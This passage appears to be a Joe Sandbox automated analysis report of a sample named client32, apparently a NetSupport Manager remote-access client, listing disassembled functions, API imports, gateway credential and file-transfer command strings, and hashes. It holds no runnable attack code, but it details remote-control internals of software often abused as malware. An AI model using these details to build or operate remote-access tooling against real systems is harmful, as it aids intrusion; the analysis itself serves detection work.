                                                                                                                                        • API ID: Pointer$AddressEncodeProc$Decode$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
                                                                                                                                        • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                                                                                                        • API String ID: 3698121176-3819984048
                                                                                                                                        • Opcode ID: 3192a3e9603f656bc7879c75a65e60241848448510c8405fe21f620736635f7d
                                                                                                                                        • Instruction ID: 0a3a35a83738db2d41967c9c59c86b7666e9b784fbd8655e5d4ecdd73dc6d466
                                                                                                                                        • Opcode Fuzzy Hash: 3192a3e9603f656bc7879c75a65e60241848448510c8405fe21f620736635f7d
                                                                                                                                        • Instruction Fuzzy Hash: FA31393AA4C22AEFDF729BB9C85861E7FB5AB77224B440526E46093390DBB1C441CF50
                                                                                                                                        Function 689042B0 Relevance: 38.7, APIs: 8, Strings: 14, Instructions: 179sleepCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • EnterCriticalSection.KERNEL32(6893B898), ref: 68904335
                                                                                                                                        • LeaveCriticalSection.KERNEL32 ref: 6890434A
                                                                                                                                        • GetTickCount.KERNEL32 ref: 6890440C
                                                                                                                                        • GetTickCount.KERNEL32 ref: 68904417
                                                                                                                                        • Sleep.KERNEL32(00000014), ref: 6890442E
                                                                                                                                        • EnterCriticalSection.KERNEL32(6893B898), ref: 6890445E
                                                                                                                                        • LeaveCriticalSection.KERNEL32(6893B898), ref: 68904494
                                                                                                                                        • SetLastError.KERNEL32(00000057), ref: 689044BD
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalSection$CountEnterLeaveTick$ErrorLastSleep
                                                                                                                                        • String ID: CMD=ADDDOMAIN$DESC=%s$FAILED$GSK=********$GUID=%s$KEY=%s$SUCCEEDED$W$ctl_adddomain %s (%d)$ctl_adddomain - INVALID PARAMETER$ctl_adddomain - OpenGatewayConnection2 FAILED (%d)$ctl_adddomain - finished waiting for reply$ctl_adddomain - waiting for reply$ctl_adddomain called
                                                                                                                                        • API String ID: 2245674308-2350087205
                                                                                                                                        • Opcode ID: 465c58f98e78d0cbe8b5714d5c23c4c0eddf6eaa5438eaaa7e6e1ff2641e7052
                                                                                                                                        • Instruction ID: 650f96ef42dd3f42b923b3434a5cd531c1e90878321230227712eae970519ac2
                                                                                                                                        • Opcode Fuzzy Hash: 465c58f98e78d0cbe8b5714d5c23c4c0eddf6eaa5438eaaa7e6e1ff2641e7052
                                                                                                                                        • Instruction Fuzzy Hash: AC5196B5C04219FFDB20DFECD884AAF77B8AF94359F808419E515AB200D735EA05CB92
                                                                                                                                        Function 688F2CE0 Relevance: 38.6, APIs: 11, Strings: 11, Instructions: 58libraryloaderCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 688F2A90: GetModuleFileNameA.KERNEL32(00000000,?,00000100), ref: 688F2ACB
                                                                                                                                          • Part of subcall function 688F2A90: _strrchr.LIBCMT ref: 688F2ADA
                                                                                                                                          • Part of subcall function 688F2A90: _strrchr.LIBCMT ref: 688F2AEA
                                                                                                                                          • Part of subcall function 688F2A90: wsprintfA.USER32 ref: 688F2B05
                                                                                                                                        • GetModuleHandleA.KERNEL32(NSMTRACE,688F2AB1), ref: 688F2CFA
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,NSMTraceLoad), ref: 688F2D15
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,NSMTraceUnload), ref: 688F2D22
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,NSMTraceGetConfigItem), ref: 688F2D2F
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,NSMTraceGetConfigInt), ref: 688F2D3C
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,vRealNSMTrace), ref: 688F2D49
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,NSMTraceClose), ref: 688F2D56
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,NSMTraceReadConfigItemFromFile), ref: 688F2D63
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,NSMTraceExclusive), ref: 688F2D70
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,NSMTraceUnexclusive), ref: 688F2D7D
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,NSMTraceSetModuleName), ref: 688F2D8A
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressProc$Module_strrchr$FileHandleNamewsprintf
                                                                                                                                        • String ID: NSMTRACE$NSMTraceClose$NSMTraceExclusive$NSMTraceGetConfigInt$NSMTraceGetConfigItem$NSMTraceLoad$NSMTraceReadConfigItemFromFile$NSMTraceSetModuleName$NSMTraceUnexclusive$NSMTraceUnload$vRealNSMTrace
                                                                                                                                        • API String ID: 3896832720-3703587661
                                                                                                                                        • Opcode ID: 68004d826ec811331db320a6dcc2dd0e0e7a60156c67b78c2011bd0f7a5d1309
                                                                                                                                        • Instruction ID: 3da7614bab69048632d57f389fdec5ed3629601fd8071bd26a87eef6103accf4
                                                                                                                                        • Opcode Fuzzy Hash: 68004d826ec811331db320a6dcc2dd0e0e7a60156c67b78c2011bd0f7a5d1309
                                                                                                                                        • Instruction Fuzzy Hash: 660199B1C9A2746BCF70EB7A6C0CE8F3AE8ABD6351B410526F005E3640E6748845CFA1
                                                                                                                                        Function 688FD790 Relevance: 35.3, APIs: 5, Strings: 15, Instructions: 277COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • wsprintfA.USER32 ref: 688FD831
                                                                                                                                        • EnterCriticalSection.KERNEL32(?,000000FF,?,?,025E2DB0,00000000,00000002), ref: 688FD892
                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 688FD8A2
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalSection$EnterLeavewsprintf
                                                                                                                                        • String ID: %02x $CID=%u$CMD=NC_DATA$CONNECTION_ID=%u$CRC=%u$Content-Length: nnnnn$DATA=$LEN=%d$NC_CRC=%u$NC_DATA$NC_DATA=$NC_LEN=%d$NC_SEQNO=%u$SEQ=%u$Sessionz %dz #%u Send %-4u bytes %s
                                                                                                                                        • API String ID: 3005300677-2101812351
                                                                                                                                        • Opcode ID: 49415f886126e178f3ffcfd78307e45dadc5ef1d58a874f60cd6c721fa045c95
                                                                                                                                        • Instruction ID: c8bd086ea540f42d3eb33fbbb42ffdc7c82b0978dc3c6ba7b24e7d970d3f3a10
                                                                                                                                        • Opcode Fuzzy Hash: 49415f886126e178f3ffcfd78307e45dadc5ef1d58a874f60cd6c721fa045c95
                                                                                                                                        • Instruction Fuzzy Hash: 4DA16476900218BFCB14DFE8CC84EEEB7B9AF99314F90491DE519AB241DB31E945CB90
                                                                                                                                        Function 689062B0 Relevance: 35.3, APIs: 12, Strings: 8, Instructions: 260sleepCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • _memset.LIBCMT ref: 689062F6
                                                                                                                                        • SetLastError.KERNEL32(00000057), ref: 689065A3
                                                                                                                                          • Part of subcall function 688F8C30: _memset.LIBCMT ref: 688F8C5B
                                                                                                                                          • Part of subcall function 688F8C30: _free.LIBCMT ref: 688F8CCC
                                                                                                                                          • Part of subcall function 688F8B50: _memset.LIBCMT ref: 688F8B68
                                                                                                                                          • Part of subcall function 688F8B50: wsprintfA.USER32 ref: 688F8B87
                                                                                                                                        • EnterCriticalSection.KERNEL32(6893B898), ref: 689063C5
                                                                                                                                        • LeaveCriticalSection.KERNEL32(6893B898), ref: 689063DE
                                                                                                                                        • _free.LIBCMT ref: 6890646E
                                                                                                                                        • _free.LIBCMT ref: 689064D2
                                                                                                                                        • _free.LIBCMT ref: 689064DB
                                                                                                                                        • GetTickCount.KERNEL32 ref: 689064E9
                                                                                                                                        • GetTickCount.KERNEL32 ref: 689064F4
                                                                                                                                        • Sleep.KERNEL32(00000064), ref: 68906509
                                                                                                                                        • EnterCriticalSection.KERNEL32(6893B898), ref: 6890652C
                                                                                                                                        • LeaveCriticalSection.KERNEL32(6893B898), ref: 6890657F
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalSection_free$_memset$CountEnterLeaveTick$ErrorLastSleepwsprintf
                                                                                                                                        • String ID: N$CMD=%s$GSK=%s$Gateway_Gsk$Gateway_Operator$Gateway_Password$ON=%s$PWD=%s
                                                                                                                                        • API String ID: 1201035089-3898729226
                                                                                                                                        • Opcode ID: 15c2c9a5ed23e4bf0f35beb41258026db5c37b49891daef4cf90e49af0245b84
                                                                                                                                        • Instruction ID: 8ae291e27023a60aa35bd29981b978a8859fe5626e08ed260806382db63b7749
                                                                                                                                        • Opcode Fuzzy Hash: 15c2c9a5ed23e4bf0f35beb41258026db5c37b49891daef4cf90e49af0245b84
                                                                                                                                        • Instruction Fuzzy Hash: 38918EB5D04319AFDB11DFE8CC84AAEB7B9AF49308F80452DE659AB244DB30D944CB90
                                                                                                                                        Function 68901770 Relevance: 33.7, APIs: 8, Strings: 11, Instructions: 443COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 6890DBD0: _malloc.LIBCMT ref: 6890DBE9
                                                                                                                                          • Part of subcall function 6890DBD0: wsprintfA.USER32 ref: 6890DC04
                                                                                                                                          • Part of subcall function 6890DBD0: _memset.LIBCMT ref: 6890DC27
                                                                                                                                        • _memset.LIBCMT ref: 68901816
                                                                                                                                        • __wcstoui64.LIBCMT ref: 68901B14
                                                                                                                                          • Part of subcall function 689149AE: strtoxl.LIBCMT ref: 689149D0
                                                                                                                                        • EnterCriticalSection.KERNEL32(6893B898,68930E3D,?,?,?,?,?,?,00000000), ref: 68901C12
                                                                                                                                        • LeaveCriticalSection.KERNEL32(6893B898,?,?,?,?,?,?,00000000), ref: 68901C62
                                                                                                                                        • EnterCriticalSection.KERNEL32(6893B898,68930E3D,?,?,?,?,?,?,00000000), ref: 68901C95
                                                                                                                                        • LeaveCriticalSection.KERNEL32(6893B898,?,?,?,?,?,?,00000000), ref: 68901CAC
                                                                                                                                        • std::exception::exception.LIBCMT ref: 68901CDA
                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 68901CF5
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalSection$EnterLeave_memset$Exception@8Throw__wcstoui64_mallocstd::exception::exceptionstrtoxlwsprintf
                                                                                                                                        • String ID: CAP$ENC$END_REC$FLG$MORE$RESULT$TIM$TMG$TXT$UID$b
                                                                                                                                        • API String ID: 29704495-3942920506
                                                                                                                                        • Opcode ID: 5a8499347661679b4eace2478f9b9275eed89908be4bbd17a48301af603113fe
                                                                                                                                        • Instruction ID: aeed20b3e0e3e3c6f5a62d571c8ae131f09c3a9827c422ad1d0afd37fd4c3164
                                                                                                                                        • Opcode Fuzzy Hash: 5a8499347661679b4eace2478f9b9275eed89908be4bbd17a48301af603113fe
                                                                                                                                        • Instruction Fuzzy Hash: ABE1A9B5D04329AFDF20DFA89C41AFF76B8AF55208F84017ED516E6201E731CA49CB96
                                                                                                                                        Function 688FA260 Relevance: 33.5, APIs: 8, Strings: 11, Instructions: 212COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • __wcstoui64.LIBCMT ref: 688FA2B6
                                                                                                                                          • Part of subcall function 689149AE: strtoxl.LIBCMT ref: 689149D0
                                                                                                                                        • __wcstoui64.LIBCMT ref: 688FA2D7
                                                                                                                                        • __wcstoui64.LIBCMT ref: 688FA2F8
                                                                                                                                        • EnterCriticalSection.KERNEL32(6893B898,?,?,?,?,?,?,?,?,?,?,?,?), ref: 688FA35A
                                                                                                                                        • LeaveCriticalSection.KERNEL32(6893B898,?,?,?,?,?,?,?,?,?,?,?,?), ref: 688FA39F
                                                                                                                                        • wsprintfA.USER32 ref: 688FA403
                                                                                                                                        • wsprintfA.USER32 ref: 688FA475
                                                                                                                                        • _free.LIBCMT ref: 688FA4BD
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: __wcstoui64$CriticalSectionwsprintf$EnterLeave_freestrtoxl
                                                                                                                                        • String ID: %02x $CONNECTION_ID$NC_CRC$NC_DATA$NC_LEN$NC_SEQNO$Sequence error! seqno: %u, previous: %u$Sessionz %dz #% Recv %-4u bytes %s$actual_crc == crc$e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c$seqno == (previous + 1)
                                                                                                                                        • API String ID: 247802158-3134913691
                                                                                                                                        • Opcode ID: e4f9fbb4feaf7f9124327b64962d71aec4a340565af133cf6b9f7d477518b1fa
                                                                                                                                        • Instruction ID: c44686d5941fb2eea28d82e9f93e2fa4df5ddbf2a5e974b12c339274ce4f204a
                                                                                                                                        • Opcode Fuzzy Hash: e4f9fbb4feaf7f9124327b64962d71aec4a340565af133cf6b9f7d477518b1fa
                                                                                                                                        • Instruction Fuzzy Hash: 3C610775D443296FDF108B988C84ABE77B9AB91358F900939F815BB200E731E942C7A2
                                                                                                                                        Function 68904CF0 Relevance: 33.4, APIs: 9, Strings: 10, Instructions: 196COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • _memset.LIBCMT ref: 68904D1C
                                                                                                                                        • _free.LIBCMT ref: 68904E16
                                                                                                                                        • _free.LIBCMT ref: 68904E5D
                                                                                                                                        • _free.LIBCMT ref: 68904E8B
                                                                                                                                        • _free.LIBCMT ref: 68904EB9
                                                                                                                                          • Part of subcall function 68907B60: _sprintf.LIBCMT ref: 68907B77
                                                                                                                                          • Part of subcall function 689077E0: _free.LIBCMT ref: 689077EF
                                                                                                                                        • _free.LIBCMT ref: 68904EF6
                                                                                                                                          • Part of subcall function 688F63C0: EnterCriticalSection.KERNEL32(6893B898,00000000,?,00000000,?,688FD77B,00000000), ref: 688F63E8
                                                                                                                                          • Part of subcall function 688F63C0: InterlockedDecrement.KERNEL32(-0003F3B7), ref: 688F63FA
                                                                                                                                          • Part of subcall function 688F63C0: EnterCriticalSection.KERNEL32(-0003F3CF,?,00000000,?,688FD77B,00000000), ref: 688F6412
                                                                                                                                          • Part of subcall function 688F63C0: GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 688F643B
                                                                                                                                          • Part of subcall function 688F63C0: GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 688F646F
                                                                                                                                          • Part of subcall function 688F63C0: GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 688F64A3
                                                                                                                                          • Part of subcall function 688F63C0: _memset.LIBCMT ref: 688F65C8
                                                                                                                                          • Part of subcall function 688F63C0: LeaveCriticalSection.KERNEL32(?,?,688FD77B,00000000), ref: 688F65D7
                                                                                                                                          • Part of subcall function 688F63C0: LeaveCriticalSection.KERNEL32(6893B898,?,00000000,?,688FD77B,00000000), ref: 688F65F2
                                                                                                                                        • _free.LIBCMT ref: 68904EED
                                                                                                                                          • Part of subcall function 68911BFD: HeapFree.KERNEL32(00000000,00000000), ref: 68911C13
                                                                                                                                          • Part of subcall function 68911BFD: GetLastError.KERNEL32(00000000), ref: 68911C25
                                                                                                                                        • _free.LIBCMT ref: 68904F09
                                                                                                                                        • SetLastError.KERNEL32(?), ref: 68904F12
                                                                                                                                          • Part of subcall function 688F8C30: _memset.LIBCMT ref: 688F8C5B
                                                                                                                                          • Part of subcall function 688F8C30: _free.LIBCMT ref: 688F8CCC
                                                                                                                                          • Part of subcall function 688F8B50: _memset.LIBCMT ref: 688F8B68
                                                                                                                                          • Part of subcall function 688F8B50: wsprintfA.USER32 ref: 688F8B87
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _free$CriticalSection_memset$AddressProc$EnterErrorLastLeave$DecrementFreeHeapInterlocked_sprintfwsprintf
                                                                                                                                        • String ID: CMD=PUTFILELINK$FNAME=%s$GSK=%s$Gateway_Gsk$Gateway_Operator$Gateway_Password$LINK=%s$ON=%s$PWD=%s$SUB=%s
                                                                                                                                        • API String ID: 2025600352-1925890548
                                                                                                                                        • Opcode ID: 85097724bdfb496fe6392095b7b3716167de4b0bd6c501c50023691a4cc5c868
                                                                                                                                        • Instruction ID: 7e2263c2091cd32bde6d5a3baa52dc097c87d767f22a1fe3d04eb72c95ae0f90
                                                                                                                                        • Opcode Fuzzy Hash: 85097724bdfb496fe6392095b7b3716167de4b0bd6c501c50023691a4cc5c868
                                                                                                                                        • Instruction Fuzzy Hash: C5617176D0421CABDB11DBE8CC40FEEB7B8AF99308F90441DE525AB245EB31E505CBA1
                                                                                                                                        Function 68911130 Relevance: 31.7, APIs: 12, Strings: 6, Instructions: 164libraryloaderCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • LoadLibraryA.KERNEL32(winhttp.dll,27CEFB69,00000000,00000000,6890361E), ref: 68911177
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,WinHttpGetIEProxyConfigForCurrentUser), ref: 689111AE
                                                                                                                                        • GlobalFree.KERNEL32(?), ref: 689111D4
                                                                                                                                        • GlobalFree.KERNEL32(?), ref: 689111E5
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,WinHttpOpen), ref: 68911207
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,WinHttpGetProxyForUrl), ref: 689112AD
                                                                                                                                        • __strdup.LIBCMT ref: 689112FC
                                                                                                                                        • GlobalFree.KERNEL32(?), ref: 6891130D
                                                                                                                                        • GlobalFree.KERNEL32(?), ref: 68911328
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,WinHttpCloseHandle), ref: 68911334
                                                                                                                                        • GlobalFree.KERNEL32(?), ref: 6891134E
                                                                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 68911359
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Free$Global$AddressProc$Library$Load__strdup
                                                                                                                                        • String ID: NS247$WinHttpCloseHandle$WinHttpGetIEProxyConfigForCurrentUser$WinHttpGetProxyForUrl$WinHttpOpen$winhttp.dll
                                                                                                                                        • API String ID: 3412555560-1656063788
                                                                                                                                        • Opcode ID: c169b9866ec375017ffd9e2b56d74cd4f3e8bcb18703ee2ae663b786cc39d365
                                                                                                                                        • Instruction ID: 845d569c9244e29e27e474b2fb3c46a42d1860f566b9be1f0e74df9d9c2c4a50
                                                                                                                                        • Opcode Fuzzy Hash: c169b9866ec375017ffd9e2b56d74cd4f3e8bcb18703ee2ae663b786cc39d365
                                                                                                                                        • Instruction Fuzzy Hash: 56513C71A08228AFEF61DF65CC44BDEB7B8AF4A704F4001A9E41CE6240EB75DA85CF50
                                                                                                                                        Function 68900F10 Relevance: 30.1, APIs: 7, Strings: 10, Instructions: 324COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 6890DBD0: _malloc.LIBCMT ref: 6890DBE9
                                                                                                                                          • Part of subcall function 6890DBD0: wsprintfA.USER32 ref: 6890DC04
                                                                                                                                          • Part of subcall function 6890DBD0: _memset.LIBCMT ref: 6890DC27
                                                                                                                                        • _memset.LIBCMT ref: 68900FAD
                                                                                                                                        • EnterCriticalSection.KERNEL32(6893B898,68930E3D,?,?,?,?,?,?,00000000), ref: 68901293
                                                                                                                                        • LeaveCriticalSection.KERNEL32(6893B898,?,?,?,?,?,?,00000000), ref: 689012E3
                                                                                                                                        • EnterCriticalSection.KERNEL32(6893B898,68930E3D,?,?,?,?,?,?,00000000), ref: 68901316
                                                                                                                                        • LeaveCriticalSection.KERNEL32(6893B898,?,?,?,?,?,?,00000000), ref: 6890132D
                                                                                                                                        • std::exception::exception.LIBCMT ref: 6890135B
                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 68901376
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalSection$EnterLeave_memset$Exception@8Throw_mallocstd::exception::exceptionwsprintf
                                                                                                                                        • String ID: CAP$ENC$END_REC$FLG$MORE$RESULT$TIM$TXT$UID$b
